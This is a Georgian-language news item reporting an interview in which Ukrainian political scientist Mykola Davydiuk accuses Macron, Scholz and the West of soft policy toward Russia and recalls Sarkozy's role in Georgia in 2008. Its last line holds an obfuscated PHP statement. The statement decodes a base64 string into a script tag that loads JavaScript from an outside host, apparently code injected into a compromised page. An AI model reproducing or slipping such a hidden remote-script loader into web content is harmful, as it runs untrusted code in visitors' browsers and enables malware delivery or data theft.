celsiusi
ავერსი საქკაბელი
უკრაინელი პოლიტოლოგის მიკოლა დავიდიუკის შეფასებით, დასავლეთი დღეს ობიექტურ და დაბალანსებულ პოლიტიკას არ აწარმოებს. ამის შესახებ, მან რადიო "მაესტროსთან" ინტერვიუში განაცხადა.  
 
მისივე თქმით, დასავლეთის ადექვატური ნაწილს და არა სრულიად დასავლეთს ესმის რუსეთიდან მომდინარე საფრთეების და იმის თუ  ვინ არის რეალურად რუსეთი. 
 
"მაგალითად, მაკრონი დღეს აცხადებს, რომ მოდით ნუ დავამცირებთ პუტინსო, ამბობს რომ მოდით რუსეთს დავეხმაროთო, მაკრონი ლამის ყოველდღე ურეკავს პუტინს და 2-3 საათი ესაუბრება, იმის ნაცვლად, რომ უკრაინას დაეხმაროს. მაგალითად იგივე შოლცი, გვეუბნება კი მოგცემთ რაკეტებს, მოგცემთ ორი წლის შემდეგ, არც იაზრებს დაგვიანებით ჩვენ გვჭირდება თუ არა რაკეტები, მშვიდად უყურებს როგორ კვდება მშვიდობიანი მოსახლეობა, შესაძლებელია ამისგან გარკვეულ სიამოვნებასაც ღებულობდეს. დასავლეთის ადექვატური ნაწილს და არა სრულიად დასავლეთს ესმის რუსეთიდან მომდინარე საფრთეების და იმის თუ  ვინ არის რეალურად რუსეთი. რასაც ჩვენ დღეს ვხედავთ, უნგრელები რუსეთის მხარეს არიან, ფრანგები და გერმანელები ასევე რუსეთის მხარეს არიან, საბერძნეთი,  კვიპროსი და იტალია გარკვეულწილად ეთამაშებიან რუსეთს.  ამ მხრივ ჩვენ სერიოზული პრობლემები გვაქვს. ჩვენ ვცდილობთ გავაერთიანოთ დასავლეთი, ვაკეთებთ შესაბამის გზავნილებს, მაგრამ იქ ძალიან ბევრია სამუშაო. თავის დროზე ქართველები ხაფანგში გაებნენ, როდესაც ნიკოლას სორკაზიმ გითხრათ, მოდით საქართველოს 20%-ის ოკუპაცია  მოახდინოს რუსეთმა, ხოლო შემდეგ ჩვენ დაგეხმარებით ამ ტერიტორიების დაბრუნებაშიო. ბოდიში, მაგრამ დღეს სად არის ნიკოლას სარკოზი? ის დღეს არის პოლიტიკური გვამი, საქართველო კი დღემდე ვერ იბრუნებს იმ ტერიტორიებს. დასავლეთმა მაშინ საქართველო მოატყუა, ზუსტად ასე ცდილობს დღეს უკრაინა მოატყუოს.  შესაბამისად, აუცილებელია ფიქრი საკუთარ ქვეყანაზე, ხალხზე და ტერიტორიებზე, არავის არ უნდა მოვუსმინოთ, ომში ავტორიტეტები არ არსებობენ, ომობენ ადამიანები,  საჭიროა ქვეყნის გათავისუფლება და მტრის გაძევება ჩვენი ტერიტორიებიდან."- განაცხადა დავიდიუკმა. 
 
ინტერვიუს სრული ვერსიის ნახვა შესაძლებელია აქ  
853
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");